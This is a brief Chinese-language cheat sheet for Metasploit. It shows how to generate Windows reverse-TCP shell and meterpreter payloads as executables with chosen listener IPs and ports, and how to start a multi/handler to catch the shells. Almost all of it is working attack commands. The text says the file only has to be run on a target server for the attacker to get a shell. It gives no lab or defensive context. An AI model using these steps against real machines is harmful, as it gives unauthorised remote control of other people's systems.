metasploit幾種shellcode類型
-
可直接用nc接收的shell
use payload/windows/x64/shell/reverse_tcp #win64 使用tcp反彈的shellcode
set lhost ip
set lport port
generate -t exe -f d:\1.exe #生成shellcode文件 - 使用meterpreter接收的shell
use payload/windows/meterpreter/reverse_tcp #win 彈meterpreter的shellcode
set lhost ip
set lport port
generate -t exe -f d:\1.exe #生成shellcode文件
生成的文件不關類型,只要讓對方服務器執行,且對方服務器可以訪問到反彈的ip和端口,便會反彈到設置的ip和port上,只需要監聽對應端口即可獲得shell
meterpreter監聽命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #該處payload可改成對應的payload,該項根據對方執行的shellcode類型
set lhost
set lport
exploit #執行後便會監聽設置的端口,如果有訪問則獲得shell